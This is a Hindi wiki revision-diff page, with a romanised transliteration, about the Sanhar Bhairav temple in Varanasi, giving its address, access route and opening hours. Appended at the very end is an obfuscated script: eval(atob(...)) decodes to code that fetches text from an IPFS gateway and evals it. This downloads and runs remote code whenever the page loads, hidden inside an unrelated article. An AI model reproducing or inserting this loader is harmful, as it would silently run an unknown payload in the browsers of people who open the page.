Difference between revisions of "संहार भैरव"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''संहार भैरव''' [[काशी के अष्ट भैरव मन्दिर|काशी के अष्ट ...' के साथ नया पन्ना बनाया)
 
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
 +
[[चित्र:Sanhaar-bhairav.jpg|thumb|संहार भैरव, [[वाराणसी]]]]
 
'''संहार भैरव''' [[काशी के अष्ट भैरव मन्दिर|काशी के अष्ट भैरव मन्दिरों]] में से एक है।  
 
'''संहार भैरव''' [[काशी के अष्ट भैरव मन्दिर|काशी के अष्ट भैरव मन्दिरों]] में से एक है।  
* संहार भैरव का मंदिर  A 1/82  पाटन दरवाजा, [[गायघाट वाराणसी|गायघाट]] के पास स्थित है।
+
* संहार भैरव का मंदिर  A 1/82  पाटन दरवाज़ा, [[गायघाट वाराणसी|गायघाट]] के पास स्थित है।
 
* इस मंदिर तक मच्छोदरी से रिक्शा द्वारा पहुंचा जा सकता है।  
 
* इस मंदिर तक मच्छोदरी से रिक्शा द्वारा पहुंचा जा सकता है।  
 
* मंदिर दर्शन पूजन के लिए सुबह 5 बजे से  11 बजे तक और शाम पांच बजे से रात साढ़े नौ बजे तक खुला रहता है।
 
* मंदिर दर्शन पूजन के लिए सुबह 5 बजे से  11 बजे तक और शाम पांच बजे से रात साढ़े नौ बजे तक खुला रहता है।
  
 +
{{seealso|भैरव मंदिर वाराणसी|बालाजी मंदिर, वाराणसी}}
  
  
Line 10: Line 12:
 
<references/>
 
<references/>
 
==संबंधित लेख==
 
==संबंधित लेख==
{{वाराणसी}}  
+
{{उत्तर प्रदेश के धार्मिक स्थल}}{{वाराणसी}}  
 
[[Category:हिन्दू मन्दिर]]
 
[[Category:हिन्दू मन्दिर]]
[[Category:उत्तर प्रदेश]][[Category:वाराणसी]][[Category:उत्तर प्रदेश के धार्मिक स्थल]][[Category:हिन्दू धार्मिक स्थल]][[Category:धार्मिक स्थल कोश]][[Category:पर्यटन कोश]][[Category:हिन्दू धर्म कोश]]
+
[[Category:उत्तर प्रदेश]][[Category:वाराणसी]][[Category:उत्तर प्रदेश के धार्मिक स्थल]][[Category:हिन्दू धार्मिक स्थल]][[Category:धार्मिक स्थल कोश]][[Category:पर्यटन कोश]][[Category:हिन्दू धर्म कोश]][[Category:धर्म कोश]]
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Latest revision as of 12:26, 19 November 2016

[[chitr:Sanhaar-bhairav.jpg|thumb|sanhar bhairav, varanasi]] sanhar bhairav kashi ke asht bhairav mandiroan mean se ek hai.

  • sanhar bhairav ka mandir A 1/82 patan daravaza, gayaghat ke pas sthit hai.
  • is mandir tak machchhodari se riksha dvara pahuancha ja sakata hai.
  • mandir darshan poojan ke lie subah 5 baje se 11 baje tak aur sham paanch baje se rat sadhe nau baje tak khula rahata hai.
  1. REDIRECTsaancha:inhean bhi dekhean


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>